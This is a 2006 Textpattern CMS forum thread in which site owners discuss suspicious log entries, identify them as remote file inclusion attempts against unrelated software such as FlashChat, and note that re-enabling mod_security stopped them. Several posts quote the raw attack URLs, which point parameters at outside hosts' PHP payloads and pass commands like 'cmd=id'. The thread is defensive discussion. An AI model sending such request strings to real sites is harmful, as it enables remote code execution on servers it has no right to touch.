Go to main content

Textpattern CMS support forum

You are not logged in. Register | Login | Help

  1. Index
  2. » Archives
  3. » Hack attempt?

#1 2006-09-11 00:22:37

NeilA
Member
From: Blue Mountains, Australia
Registered: 2004-08-15
Posts: 316
Website

Hack attempt?

I’m seeing a funny entry in the log for one TXP site I have:

/index.php?file=http://clonebox.altervista.org/ex.txt?

It’s appeared twice in the last few hours, from different IP’s. If I load up the URL, it displays a big PHP file. Is this some kind of hack attempt? It doesn’t look very legit to me.

Can anyone shed any light?

Cheers


Neil – Blue Mountains, Australia

http://westserve.org
http://ministrygrounds.net.au

Offline

#2 2006-09-11 00:38:15

Neko
Member
Registered: 2004-03-18
Posts: 458

Re: Hack attempt?

Altervista is a free hosting provider, you could at least ask them to remove that file, it really looks like something created to crack web-sites. The address used to file complaints is abuse@altervista.it.

Offline

#3 2006-09-11 00:39:48

NeilA
Member
From: Blue Mountains, Australia
Registered: 2004-08-15
Posts: 316
Website

Re: Hack attempt?

Thanks Neko…

Didn’t think it looked right… :)


Neil – Blue Mountains, Australia

http://westserve.org
http://ministrygrounds.net.au

Offline

#4 2006-09-11 00:58:09

jm
Plugin Author
From: Missoula, MT
Registered: 2005-11-27
Posts: 1,746
Website

Re: Hack attempt?

Yeah, one of my sites has been having the same problem. They’re from different IPs and different websites, but 3 of the files are the same (targeting aedating systems, chatbots, and other nonexistant junk). Then again, people search for free mp3s, mpeg encoders, and other completely irrelevant terms with the site search.

Fortunately, Textpattern is resistent to these stupid includes. Thanks Team TXP!

The latest ones are:

  • /developers/header.php?path=http://71.132.210.125/omg/remote.txt?
  • /forum/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.2therescue.com/tool25.dat?&list=1&cmd=id
  • /forum/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.19abi99.com/tool25.dat?&list=1&cmd=id
  • /developers/php?function=http://0100.iespana.es/cmd.jpg??

I think some script kiddie posted these to a forum, as they sporadically. No big deal though.

Offline

#5 2006-09-11 02:27:20

Mary
Sock Enthusiast
Registered: 2004-06-27
Posts: 6,236

Re: Hack attempt?

Sounds like referrer spamming combined a hack attempt (i.e.: spam the log, and wait for unsuspecting victim to load the url). Never trust urls provided by unknown third parties (emails or referrer logs, etc).

Offline

#6 2006-09-11 04:15:24

zem
Developer Emeritus
From: Melbourne, Australia
Registered: 2004-04-08
Posts: 2,579

Re: Hack attempt?

Some of these are exploits targetting something called FlashChat.

The gist of this FAQ entry is accurate: it’s common enough to notice lame wannabe hackers attempting to use exploits for unrelated software against your web site.


Alex

Offline

#7 2006-09-11 06:19:08

NeilA
Member
From: Blue Mountains, Australia
Registered: 2004-08-15
Posts: 316
Website

Re: Hack attempt?

Thanks for all the info people.
It’s been a good educational experience… :-)


Neil – Blue Mountains, Australia

http://westserve.org
http://ministrygrounds.net.au

Offline

#8 2006-09-11 11:07:14

NeilA
Member
From: Blue Mountains, Australia
Registered: 2004-08-15
Posts: 316
Website

Re: Hack attempt?

Just for the record…

I had turned off mod_security on that domain because of problems saving some cURL code in a TXP form.

Turning it back on gets rid of all the offending hits on the site… Also explains why it was only this domain getting the hits…


Neil – Blue Mountains, Australia

http://westserve.org
http://ministrygrounds.net.au

Offline

  1. Index
  2. » Archives
  3. » Hack attempt?

Board footer

Powered by FluxBB